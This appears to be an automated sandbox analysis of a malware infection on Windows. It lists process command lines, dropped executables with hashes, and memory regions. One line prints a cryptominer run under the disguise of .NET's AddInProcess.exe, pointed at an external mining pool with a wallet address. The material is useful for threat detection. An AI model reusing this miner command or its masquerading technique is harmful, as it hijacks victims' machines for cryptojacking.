"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RBvfugTGdvfZCHCgvSoHZdsYt2u1JwYhUP.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5296 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5296 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,2177765799250008285,7287331137101065828,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1

Network


Files

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 d974162e0cccb469e745708ced4124c0
SHA1 2749ebc0ddaa6ae0c59c1f92f6dbb509cc0f5929
SHA256 77793c069040127f89af88feb293829bd66c1df811b31d5b709868f0c9dd1df5
SHA512 ab716b96f09c5a8c1a957c209ed13958f5a21abcd488437aab8f1b1107e758207e3a51c264b39463256bf58a2266de771fa73477b0555be6cc4221f84e3684a1

C:\Users\Admin\AppData\Local\Temp\8F59.exe

MD5 bf58b6afac98febc716a85be5b8e9d9e
SHA1 4a36385b3f8e8a84a995826d77fcd8e76eba7328
SHA256 16b88051fd1e27d08d1408bb51002dd25edb88292807a92ee25ba5f4c0895b8d
SHA512 a3f8deabbb35e4d4928ec6cf836cdef1a57aed879ce10646d3f8cd9cccf93c0c80c89d1e82dc6c9c558f61429eb6416f5ecd8235f8933f90db6bb46f7cf165ec

memory/1272-254-0x0000000073A10000-0x00000000741C0000-memory.dmp

memory/3488-257-0x0000000000300000-0x00000000004D8000-memory.dmp

memory/3384-262-0x0000000000470000-0x00000000004CA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 f04d196aedab9123c9b7319d0519f111
SHA1 4e5776719bd491a9c71ee72f5aca166fa97fc8f4
SHA256 6340426d2f7a17047c45cd019536aca386e66f75f636fbc5a4f68b3ab1407eba
SHA512 b1b1be0f173e87a890099378cd926b10c9467e9db2d6690adb829c10e2c827afece8ed1f055c6347fa3ea51689e377793f151b4124adb94103f65258c6c35413

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1b7e4e581c2fba1236a50fe9d2a0ba4d
SHA1 f073643262dff0b6f27072d8f1bed3679d2cbc5f
SHA256 66b5ebe8c619668fc2e88428c25beaf7d7bc953a8809d45f34372e5771af528a
SHA512 9d164aa9c270afdcb575841f578844537d19b9379f91f34ffd212b42767e6a2504e6315fc5ff95de9ddb9b5e2ca164179c4a6ed3321f6e1a519ca70d9451648e

C:\Users\Admin\AppData\Local\Temp\8F59.exe

MD5 bf58b6afac98febc716a85be5b8e9d9e
SHA1 4a36385b3f8e8a84a995826d77fcd8e76eba7328
SHA256 16b88051fd1e27d08d1408bb51002dd25edb88292807a92ee25ba5f4c0895b8d
SHA512 a3f8deabbb35e4d4928ec6cf836cdef1a57aed879ce10646d3f8cd9cccf93c0c80c89d1e82dc6c9c558f61429eb6416f5ecd8235f8933f90db6bb46f7cf165ec

memory/3384-276-0x0000000073A10000-0x00000000741C0000-memory.dmp

memory/3488-277-0x0000000000300000-0x00000000004D8000-memory.dmp

memory/3384-278-0x0000000007560000-0x0000000007B04000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 685d55d6fcc320b89fc11edfbe26f200
SHA1 bc2857d595d48c7810754aa54fb700b5fcc77bd6
SHA256 135d39709e660fbfc1ea41838269a5a9dcf2c5a72fcdd139474da8c896757f56
SHA512 9515e43c978062c5e9ab2ee76b781be2647d8fcd5a692947f9e6eab13e4890e83a9fcc17465a3589f13d8d2b4bcecb64f919e5f826c48aafc19aa96a7bd7e3bf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 d985875547ce8936a14b00d1e571365f
SHA1 040d8e5bd318357941fca03b49f66a1470824cb3
SHA256 8455a012296a7f4b10ade39e1300cda1b04fd0fc1832ffc043e66f48c6aecfbf
SHA512 ca31d3d6c44d52a1f817731da2e7ac98402cd19eeb4b48906950a2f22f961c8b1f665c3eaa62bf73cd44eb94ea377f7e2ceff9ef682a543771344dab9dbf5a38

C:\Users\Admin\AppData\Local\Temp\set16.exe

MD5 22d5269955f256a444bd902847b04a3b
SHA1 41a83de3273270c3bd5b2bd6528bdc95766aa268
SHA256 ab16986253bd187e3134f27495ef0db4b648f769721bc8c84b708c7ba69156fd
SHA512 d85ada5d8c2c02932a79241a484b088ba70bda0497fd8ad638300935a16841d7cbc8258be93055907cb533bc534fdd48c7c91109fa22f87e65a6b374cd51055c

memory/3252-301-0x0000000000470000-0x00000000004CA000-memory.dmp

memory/3036-306-0x00007FFDC4630000-0x00007FFDC50F1000-memory.dmp

memory/3384-309-0x0000000007060000-0x0000000007070000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\set16.exe

MD5 22d5269955f256a444bd902847b04a3b
SHA1 41a83de3273270c3bd5b2bd6528bdc95766aa268
SHA256 ab16986253bd187e3134f27495ef0db4b648f769721bc8c84b708c7ba69156fd
SHA512 d85ada5d8c2c02932a79241a484b088ba70bda0497fd8ad638300935a16841d7cbc8258be93055907cb533bc534fdd48c7c91109fa22f87e65a6b374cd51055c

memory/3036-315-0x000002191A120000-0x000002191A130000-memory.dmp

memory/3744-332-0x0000000000010000-0x0000000000018000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-J8J2G.tmp\is-VCMSS.tmp

MD5 2fba5642cbcaa6857c3995ccb5d2ee2a
SHA1 91fe8cd860cba7551fbf78bc77cc34e34956e8cc
SHA256 ddec51f3741f3988b9cc792f6f8fc0dfa2098ef0eb84c6a2af7f8da5a72b40fa
SHA512 30613b43427d17115134798506f197c0f5f8b2b9f247668fa25b9dd4853bbd97ac1e27f4e3325dec4f6dfc0e448ebbddb2969ad1a1781aa59ebf522d436aed7c

memory/1272-339-0x0000000073A10000-0x00000000741C0000-memory.dmp

memory/3744-342-0x00007FFDC4630000-0x00007FFDC50F1000-memory.dmp

memory/3744-343-0x000000001ADD0000-0x000000001ADE0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Temp\is-J8J2G.tmp\is-VCMSS.tmp

MD5 2fba5642cbcaa6857c3995ccb5d2ee2a
SHA1 91fe8cd860cba7551fbf78bc77cc34e34956e8cc
SHA256 ddec51f3741f3988b9cc792f6f8fc0dfa2098ef0eb84c6a2af7f8da5a72b40fa
SHA512 30613b43427d17115134798506f197c0f5f8b2b9f247668fa25b9dd4853bbd97ac1e27f4e3325dec4f6dfc0e448ebbddb2969ad1a1781aa59ebf522d436aed7c

C:\Users\Admin\AppData\Local\Temp\kos.exe

MD5 076ab7d1cc5150a5e9f8745cc5f5fb6c
SHA1 7b40783a27a38106e2cc91414f2bc4d8b484c578
SHA256 d1b71081d7ba414b589338329f278ba51c6ccf542d74f131f96c2337ee0a4c90
SHA512 75e274a654e88feb0d66156f387bc5e420811f4f62939396a7455d12e835d7e134b2579ab59976c591b416d1ec1acdf05e9eb290c8f01383c6a50bf43854420b

memory/3312-350-0x0000000000400000-0x00000000004B2000-memory.dmp

memory/3472-367-0x0000000000530000-0x0000000000531000-memory.dmp

memory/3312-368-0x000001CD7B2C0000-0x000001CD7B3C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-L4HBE.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/3312-380-0x00007FFDC4630000-0x00007FFDC50F1000-memory.dmp

C:\Program Files (x86)\PA Previewer\previewer.exe

MD5 27b85a95804a760da4dbee7ca800c9b4
SHA1 f03136226bf3dd38ba0aa3aad1127ccab380197c
SHA256 f98b98404ecf3871a10a290ade21ad77d0b2633f47247debc53d094b9bdff245
SHA512 e760a15370272aa9541f1afceaaf4f5a8068dad21c6a8d50ebd01514e16bbc8f867c8af349080f3d1fa7a19eafe7cde74921d01716dea69ef801da1b74eae4a7

memory/3312-383-0x000001CD62BE0000-0x000001CD62BF0000-memory.dmp

memory/3384-381-0x0000000007D80000-0x0000000007DE6000-memory.dmp

memory/5308-387-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/380-389-0x0000000003560000-0x0000000003691000-memory.dmp

memory/380-402-0x00000000033E0000-0x0000000003551000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c3062ca0b26766a979754d835169046b
SHA1 df4b15ed270ab25a581492780bf0880b2c0a6457
SHA256 1c13ab046a3f963ce3e0d693c01e75ebb263541d788b68c0c0a0168424976515
SHA512 95d7ef8ca983c28b1e967772b5cace216adc35b1cdeba01761e3d9216432a80db5d23c68892d8ad3026bd45d3d7a2551a842e776495b23108f9bbc51c1514493

memory/5308-422-0x0000000000400000-0x00000000005F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 25d0f6bb96b454b6fc511f8f6935290c
SHA1 29de7a184f56c937e97852ea5874528f1830ca13
SHA256 d882796c2d7339be4c9ebcd54c60e0ffa1e4932cb79d40fd6e65a1d8176caa51
SHA512 5df4e5d89155b3631458966d8eac38fc0ce442047206f319d67025a5cfd330f01f02c37420d1f0ed1d9e21cb1db7a0be414bc901fb909f7c84ed085c5a8b9b7d

C:\ProgramData\ContentDVSvc\ContentDVSvc.exe

MD5 27b85a95804a760da4dbee7ca800c9b4
SHA1 f03136226bf3dd38ba0aa3aad1127ccab380197c
SHA256 f98b98404ecf3871a10a290ade21ad77d0b2633f47247debc53d094b9bdff245
SHA512 e760a15370272aa9541f1afceaaf4f5a8068dad21c6a8d50ebd01514e16bbc8f867c8af349080f3d1fa7a19eafe7cde74921d01716dea69ef801da1b74eae4a7

memory/3384-461-0x0000000073A10000-0x00000000741C0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 9de924f821d68336853ad9cb25af6942
SHA1 7b27fa1f4ca10131b74abf07fea7e87d886922cb
SHA256 3defe2452083dbff7890047269413b841903769edb65ecda2f54f13a649c3000
SHA512 6e7dcdc347b51a07a9af61a4db20ee677a460658b1afe0835f7a157ecfaedc18f073adc1ed5cbb84d5c533269da24e9c20627e5741f42887d1ab81ab8e4146fe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 150445fdbece1407d1fe194e62028cde
SHA1 40eb351765a6ba4bbd7fd0d1b98d59f1383fd2f1
SHA256 50cdfd030079d7cc01801d5ecf6db92eed565a92177d90471fe759ce7f5e1eaa
SHA512 673d3816dfe9bee61bb66988c5faba41816c1c67875e80d388baa1f1b39a20cc77839ccae6854febaa73ab9f2f4f21992c1ee5cdb135012da3df3d3e83fed2ed

C:\Program Files (x86)\PA Previewer\previewer.exe

MD5 27b85a95804a760da4dbee7ca800c9b4
SHA1 f03136226bf3dd38ba0aa3aad1127ccab380197c
SHA256 f98b98404ecf3871a10a290ade21ad77d0b2633f47247debc53d094b9bdff245
SHA512 e760a15370272aa9541f1afceaaf4f5a8068dad21c6a8d50ebd01514e16bbc8f867c8af349080f3d1fa7a19eafe7cde74921d01716dea69ef801da1b74eae4a7

memory/5948-492-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/3312-493-0x000001CD62B80000-0x000001CD62B88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 ec6aae2bb7d8781226ea61adca8f0586
SHA1 d82b3bad240f263c1b887c7c0cc4c2ff0e86dfe3
SHA256 b02fffaba9e664ff7840c82b102d6851ec0bb148cec462cef40999545309e599
SHA512 aa62a8cd02a03e4f462f76ae6ff2e43849052ce77cca3a2ccf593f6669425830d0910afac3cf2c46dd385454a6fb3b4bd604ae13b9586087d6f22de644f9dfc7

memory/3312-500-0x000001CD7B530000-0x000001CD7B586000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 d8d26ec251e7f46977e2e0e058b541dc
SHA1 b6030cb4f7919c7076b4ad472c60658933adb17e
SHA256 29a872b5182c46cf63005bf2d9203732104f2033a134e051944428a1ddcc0bf7
SHA512 4823881d75cdd5224a1cfff487b077cab1ecee4e147a803f4e3c7cd22acd1d6fd5ffa0aaf9d6f7fdb9ce21d015953abee9fdcada9cef4b2bb5eea004ab9b1007

memory/3384-512-0x0000000007060000-0x0000000007070000-memory.dmp

memory/2016-513-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe59c876.TMP

MD5 303ea8cb21b442840b4f025b42788acd
SHA1 f94448d623d8710c89693c0b498262932bbca2e8
SHA256 a6859b48df3d5485dfaa10f146998a8ffb2eb5a5e5f32d2f597804d6acd59950
SHA512 19d71170c94d273c2302c2c625f2e97534b8965bc22720ba13e863a2ae357a20f8bd39437d8f642f1d0a5079b719e0b34a638bd76fd8fe69829630c933e498d3

memory/5948-514-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/5308-460-0x0000000000400000-0x00000000005F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Program Files (x86)\PA Previewer\previewer.exe

MD5 27b85a95804a760da4dbee7ca800c9b4
SHA1 f03136226bf3dd38ba0aa3aad1127ccab380197c
SHA256 f98b98404ecf3871a10a290ade21ad77d0b2633f47247debc53d094b9bdff245
SHA512 e760a15370272aa9541f1afceaaf4f5a8068dad21c6a8d50ebd01514e16bbc8f867c8af349080f3d1fa7a19eafe7cde74921d01716dea69ef801da1b74eae4a7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6c0245ca5a6198f46ea7a20e1f0bd2be
SHA1 7b3b3f734199be352242d649a501b5aaa073c093
SHA256 26f20e09f538a8eab45d9f0f05298dca6c187b61a05dd0e66fb11d3c34d4adaa
SHA512 34ee6892782f4fffe6161498c415dd9eccaed9671b134d6a6aa6f7bfd399ddf32a96247987693c9971b70a1f53a460cdbf054aa54cbe7deb6299fd8303de0541

memory/3036-369-0x00007FFDC4630000-0x00007FFDC50F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-L4HBE.tmp\_isetup\_isdecmp.dll

MD5 b4786eb1e1a93633ad1b4c112514c893
SHA1 734750b771d0809c88508e4feb788d7701e6dada
SHA256 2ae4169f721beb389a661e6dbb18bc84ef38556af1f46807da9d87aec2a6f06f
SHA512 0882d2aa163ece22796f837111db0d55158098035005e57cd2e9b8d59dc2e582207840bf98bee534b81c368acf60ab5d8ecbe762209273bda067a215cdb2c0c6

C:\Users\Admin\AppData\Local\Temp\is-L4HBE.tmp\_isetup\_isdecmp.dll

MD5 b4786eb1e1a93633ad1b4c112514c893
SHA1 734750b771d0809c88508e4feb788d7701e6dada
SHA256 2ae4169f721beb389a661e6dbb18bc84ef38556af1f46807da9d87aec2a6f06f
SHA512 0882d2aa163ece22796f837111db0d55158098035005e57cd2e9b8d59dc2e582207840bf98bee534b81c368acf60ab5d8ecbe762209273bda067a215cdb2c0c6

C:\Users\Admin\AppData\Local\Temp\kos.exe

MD5 076ab7d1cc5150a5e9f8745cc5f5fb6c
SHA1 7b40783a27a38106e2cc91414f2bc4d8b484c578
SHA256 d1b71081d7ba414b589338329f278ba51c6ccf542d74f131f96c2337ee0a4c90
SHA512 75e274a654e88feb0d66156f387bc5e420811f4f62939396a7455d12e835d7e134b2579ab59976c591b416d1ec1acdf05e9eb290c8f01383c6a50bf43854420b

C:\Users\Admin\AppData\Local\Temp\kos.exe

MD5 076ab7d1cc5150a5e9f8745cc5f5fb6c
SHA1 7b40783a27a38106e2cc91414f2bc4d8b484c578
SHA256 d1b71081d7ba414b589338329f278ba51c6ccf542d74f131f96c2337ee0a4c90
SHA512 75e274a654e88feb0d66156f387bc5e420811f4f62939396a7455d12e835d7e134b2579ab59976c591b416d1ec1acdf05e9eb290c8f01383c6a50bf43854420b

memory/2016-314-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\set16.exe

MD5 22d5269955f256a444bd902847b04a3b
SHA1 41a83de3273270c3bd5b2bd6528bdc95766aa268
SHA256 ab16986253bd187e3134f27495ef0db4b648f769721bc8c84b708c7ba69156fd
SHA512 d85ada5d8c2c02932a79241a484b088ba70bda0497fd8ad638300935a16841d7cbc8258be93055907cb533bc534fdd48c7c91109fa22f87e65a6b374cd51055c

memory/3252-311-0x0000000000400000-0x0000000000469000-memory.dmp

memory/3384-308-0x0000000007150000-0x000000000715A000-memory.dmp

memory/3384-280-0x0000000007090000-0x0000000007122000-memory.dmp

memory/3472-525-0x0000000000400000-0x00000000004B0000-memory.dmp

memory/3384-527-0x0000000008A20000-0x0000000008A96000-memory.dmp

memory/3744-528-0x00007FFDC4630000-0x00007FFDC50F1000-memory.dmp

memory/3384-529-0x0000000008AA0000-0x0000000008ABE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3d8f4eadb68a3e3d1bf2fa3006af5510
SHA1 d5d8239ec8a3bf5dadf52360350251d90d9e0142
SHA256 85a80218f4e5b578993436a6b8066b60508dd85a09579a4cb6757c2f9550d96c
SHA512 554773c4edd8456efaa23ac24970af5441e307424de3d2f41539c2cf854d57e7f725bf0c9986347fd3f2ff43efc8f69fd73c5d773bbfd504a99daca2b272a554

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 adf1f0f820920072fd02e6bd1bb46fae
SHA1 e67844f08a5682712410e015f68407ee2ae69245
SHA256 8756adb744b4d1fcfe164e40c99f208cd8a1f5ddfd0263808e48d7f5ac8d7b5a
SHA512 0776fbed8dd8dd376bd4827249c054df59c38a7104ddea8bcd5d3da42b6f61cea5f4d45650946727917efd6254f0f00d246b6abf55a9342304f98bf4dab45ccf

memory/3384-565-0x0000000008CE0000-0x0000000008EA2000-memory.dmp

memory/3384-566-0x00000000093E0000-0x000000000990C000-memory.dmp

memory/3744-569-0x000000001ADD0000-0x000000001ADE0000-memory.dmp

memory/3472-570-0x0000000000530000-0x0000000000531000-memory.dmp

memory/3312-572-0x000001CD62BE0000-0x000001CD62BF0000-memory.dmp

memory/3312-571-0x00007FFDC4630000-0x00007FFDC50F1000-memory.dmp

memory/3744-577-0x00007FFDC4630000-0x00007FFDC50F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 1604bfc8cf2a7bb375cdbe80063dd20a
SHA1 36fa180b7d4b87a8b99c2f0ba4473f55d887bd07
SHA256 cc9d195222a76e3941bc1140664d2fb069128eb3facd69e411268ee480e229f9
SHA512 ae7ae8c4870b1e051593491cbd8cce7a0613cfc6235f78cab4dfb32e58d1a302e8763b8dfbd3ae1283a54718bea9aea738dd9d4000f202465fa657ab2563f10d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 16e38f86db35e3b5b117be42905b5e6a
SHA1 0e2c7daa03eeffbc2f411ad0ddf3cbe8a2b79e8a
SHA256 d36173d4d8800640c0d0fd409bae6d5d6e5216374c8a7689bd4bcad4f5342a71
SHA512 b949199d3ef3c0ad1b00f37e5ac5694c72ab49180502eaea8ac53ead486a1ea664b288702e4584b682222749d79d6d7da43273fa0668282d97f4ac3a99f6e390

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 01c070bfdf2e411241754ca68a1643e3
SHA1 a718a8dd9e4d5404ad1048377bb0eb77d6a7fdd7
SHA256 fff153ff92c38b3a1765531af58751b809617bb5d878dde8df084493616da352
SHA512 56a898c3f9921dbc6e1ba563b1c8b1de120246f02a49afa7957ab9d3bc2d60ef805190d8815ca278f4cf31a033804beb5e80c67d9a3f65df99d3ab3c93ba9d9e

memory/5948-633-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/208-667-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/208-668-0x0000000140000000-0x00000001407CF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

memory/208-677-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/208-678-0x000002777D8A0000-0x000002777D8C0000-memory.dmp

memory/208-680-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/208-681-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/208-682-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/208-683-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/208-684-0x0000000140000000-0x00000001407CF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9bfc31dbd8fcf94bb75a3c1ec72ce5d7
SHA1 d969b688efd5d02bc515f5c0d5ee6462e7304af5
SHA256 00603079de0d42196c41f25e5fcd316c115f355f65f322bb76ddfee2eee8771e
SHA512 5a35ce9d6fe288b670dd3e96a749ce76fd203726a75833b7c1b3584c1db7a6f2fe7547090900932f8b2e67593127096daed4b77753b819f2b3bdc74006fc981b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ad75017aa7e2d641ffa1349a8c4162bd
SHA1 5a6dbd2f38a535763f61f238695e6b312a4f9194
SHA256 3775d5d0a37dac16b53a44a782777a72e8e27368f718b92f51c6a583171d0aeb
SHA512 edc62cf089ec51dd6edfc65a8396b2ccf60a2362794b2297b3ff8f6bc14fca5b2de7a31633aa82f82e181a67377fd8c91e96b6bb099523eb3ef7965d17161a9e

memory/5948-714-0x0000000000400000-0x00000000005F1000-memory.dmp